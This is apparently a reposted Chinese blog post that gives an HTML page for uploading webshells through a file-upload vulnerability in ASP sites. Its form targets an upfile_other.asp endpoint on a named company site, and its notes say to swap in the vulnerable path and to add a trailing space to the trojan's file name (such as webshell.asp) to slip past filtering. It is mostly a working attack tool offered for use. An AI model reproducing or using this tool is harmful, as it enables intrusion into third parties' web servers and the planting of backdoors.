利用漏洞本地上传工具

利用漏洞上传工具解析
本文介绍了一种利用网站漏洞进行本地文件上传的工具。通过修改源代码中的路径,可以指向存在漏洞的文件,并实现特定文件(如木马)的上传。需要注意的是,在上传文件名后必须添加空格以确保操作有效。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>利用漏洞本地上传工具</title>
<style type="text/css">
<!--
body {
 background-color: #000000;
}
}
button{background:#fff;border:1px solid #999;padding:2px 2px 0px 2px;margin:4px;border-width:1px 3px 1px 3px;}
input.button{
 background:#fff;border:1px solid #999;padding:2px 2px 0px 2px;margin:4px;border-width:1px 3px 1px 3px;
}
input.buttonUnActive{
 color: #ffffff;
 background-color: #CCD8E6;
 border: 1px solid #A4B9D2;
 height:20px;
 cursor:pointer;
 background:url(../images/Control/UAb.jpg) 
 
}

.STYLE3 {color: #FF0000; font-size: 14px; }
.STYLE4 {color: #00FF00}
body,td,th {
 font-size: 12px;
}
.STYLE5 {color: #FFFFFF}

-->
</style></head>

<body>
<form action=http://www.guerqi-chemicals.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">图片</span><span class="STYLE4">)文件:
  </span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
 目标(</span><span class="STYLE3">大马</span><span class="STYLE4">)文件:
  </span>
 <input name="filename1" type=file class=buttonUnActive size=20></p>

<p align="center">
  <input name=submit type=submit class="button"  style=border"1px value=上传大马 double rgb(88.88.88);font:9pt>
  <input name=imgwidth type=hidden id=imgwidth>
  <input name=imgheight type=hidden id=imgheight>
  <input name=aligntype type=hidden id="channelid" value="0">
  <input name="channelid" type="hidden" id="channelurlid" value=0>
  <input name="id" type="hidden" id="id2">
</p>
<p align="center"><span class="STYLE3">注意:</span><span class="STYLE4">漏洞文件路径需要在源代码中修改~~( 代码编辑模式下找到 action=<span class="STYLE5">http://www.xxxxx.cn/upfile_other.asp</span> 白色部分是漏洞文件路径)</span></p>
<p><span class="STYLE4"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;上传木马时文件名后必须加空格 否则无效~~(如:E:\webshell.asp )</span></p>
  <form>
  <br>
  <br>
  <br>
</body>
</html>


原文链接: http://blog.youkuaiyun.com/mypc2010/article/details/7961097

转载于:https://my.oschina.net/changpinghu/blog/92546

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值